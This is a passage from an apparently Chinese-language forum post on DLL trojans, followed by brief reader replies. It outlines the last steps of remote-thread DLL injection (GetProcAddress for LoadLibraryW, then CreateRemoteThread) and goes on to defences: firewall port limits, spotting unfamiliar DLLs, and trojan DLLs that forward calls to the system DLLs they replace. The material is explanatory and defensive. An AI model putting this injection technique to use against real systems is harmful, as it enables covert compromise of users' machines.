（5）利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址，这个函数将作为随后将启动的远程线程的入口函数；
（6）利用Windows API CreateRemoteThread启动远程线程，将LoadLibraryW的地址作为远程线程的入口函数地址，将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL；
（7）清理现场。
DLL木马的防治
从DLL木马的原理和一个简单的DLL木马程序中我们学到了DLL木马的工作方式，这可以帮助我们更好地理解DLL木马病毒的防治手段。
一般的木马被植入后要打开一网络端口与攻击程序通信，所以防火墙是抵御木马攻击的最好方法。防火墙可以进行数据包过滤检查，我们可以让防火墙对通讯端口进行限制，只允许系统接受几个特定端口的数据请求。这样，即使木马植入成功，攻击者也无法进入到受侵系统，防火墙把攻击者和木马分隔开来了。
对于DLL木马，一种简单的观察方法也许可以帮助用户发现之。我们查看运行进程所依赖的DLL，如果其中有一些莫名其妙的DLL，则可以断言这个进程是宿主进程，系统被植入了DLL木马。"道高一尺，魔高一丈"，现如今，DLL木马也发展到了更高的境界，它们看起来也不再"莫名其妙"。在最新的一些木马里面，开始采用了先进的DLL陷阱技术，编程者用特洛伊DLL替换已知的系统DLL。特洛伊DLL对所有的函数调用进行过滤，对于正常的调用，使用函数转发器直接转发给被替换的系统DLL；对于一些事先约定好的特殊情况，DLL会执行一些相应的操作。
[查看全文]

:handshake先支持！ 再学习！
[查看全文]

顶顶，学习了...
[查看全文]

先来顶下！
[查看全文]

这个文件只需要放到system32 下？？
[查看全文]